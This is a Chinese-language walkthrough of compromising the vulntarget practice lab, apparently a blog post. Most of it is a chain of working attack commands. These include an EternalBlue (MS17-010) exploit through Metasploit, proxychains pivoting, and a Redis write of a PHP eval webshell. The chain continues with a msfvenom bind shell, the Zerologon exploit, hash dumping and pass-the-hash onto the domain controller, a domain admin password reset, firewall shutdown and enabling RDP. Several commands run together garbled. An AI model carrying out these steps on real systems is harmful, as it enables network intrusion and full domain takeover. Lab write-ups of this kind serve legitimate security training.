ad一,靶场搭建
下载靶场:GitHub - crow821/vulntarget: vulntarget靶场系列
官方拓补图
ps:此处 攻击机ip192.168.87.134,win7ip1为192.168.87.144
下载完毕后直接装入虚拟机不要进去,不要进去,不要进去
唯一 要修改的是网卡
设置虚拟网卡:默认为vmnet18和vmnet19
找到虚拟网卡编辑器
右下角点更改设置
同下图配置vmnet18
同理配置vmnet19
检查各设备的网卡设置
单机选设置打开窗口查看
win2019
Win11016
win7
配完去攻击机上访问win7ip看看能否访问,可以就表示配置完成
渗透开始
信息收集(win7)
nmap -sT 192.168.87.0/24
发现win7
访问
查看开放了那些端口
nmap -sT --min-rate 10000 -p- 192.168.87.144 
发现开放了445端口,决定用永恒之蓝一把嗦
输入msfconsole启动msf
clearsearch ms17-010use 0set Rhost 192.168.87.144run
进入meterperter成功拿下
win7信息收集
ipconfig
发现了c段位20的内网
但别急先留个路由
run post/multi/manage/autoroute
退回msf6(小白必看)
bgback这么做是为了保存session
搜索20c段的主机
使用arp_scanner模块
use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24
发现了99主机
使用socks_proxy做代理
use auxiliary/server/socks_proxy
set version 4a
run
修改etc/proxychains4.conf
vim /etc/proxychains4.conf
加上 socks4即可
esc:wq退出
使用proxychains4对10.0.20.99进行端口扫描
proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99
看结果
扫到了 如上端口
开放了80端口访问一下phpinfo.php
ctrl f搜索root
发现了根目录路径
使用redis未授权访问xieshell
注意kali不会自带redis使用要下载redis
redis下载
参考http://t.csdnimg.cn/FnwUE
proxychains4 redis-cli -h 10.0.20.99
进入目录写入shell
config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 "<?php @eval($_POST['cmd'])?>"
save
用procychains4代理使用哥斯拉连接
哥斯拉下载
官网https://github.com/BeichenDream/Godzilla
下载jar包后拖入虚拟机使用
注意使用时要保证你处于jar包同更目录不然访问不到
以砖面为例
弹出界面即唱功
点击target,选择add,如下填写
添加唱功后enter进入
进入控制台
关闭防火前以便于传shell
netsh advfirewall set allprofiles state off 用msfvenom写一个shell
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe
可在桌面上发现
打开f哥斯拉的ilemanger 拖入上传
打开控制台运行shell
.\shell.exe
msf连接shell
成功
win2016信息收集
ipconfig发现10c段
加个路由先
run post/multi/manage/autoroute
进shell继续星系收集
shellChcp 65001 #优化shell使用utf-8编码systeminfo
发现了域 vulntarget.com
查看域控(有时不好使)
net group "Domain Controllers" /domain
发现域控win2019ping一下
ping -n 1 WIN2019
ip为 10.0.10.110
CVE-2020-1472上线域控
exp下载
地址https://github.com/VoidSec/CVE-2020-1472
下这个就行,放桌面
运行
proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
不行的话
给他加个参数
proxychains4 python3 cve-2020-1472-exploit.py -t WIN2019 -n 10.0.10.110获取hash
proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass
得到hash,wmiexec上线
proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 ./administrator@10.0.10.110
成功
net user administrator p-0p-0p-0 /domain #修改域控密码
netsh advfirewall set allprofiles state off #关防火墙#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
已完成不做演示,已经打穿
图形化连接域控
使用remmina
apt install -y remmina
或
dnf install -y remmina启动
proxychains4 remmina
改下配置
连接
成功
修改一下窗口尺寸
点玩后ctrl加滚轮可对其缩放
但有时会遇到连接失败的问题
是3389打开与否问题
可尝试
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /fwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allowreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f完
)
原理及实现)
)
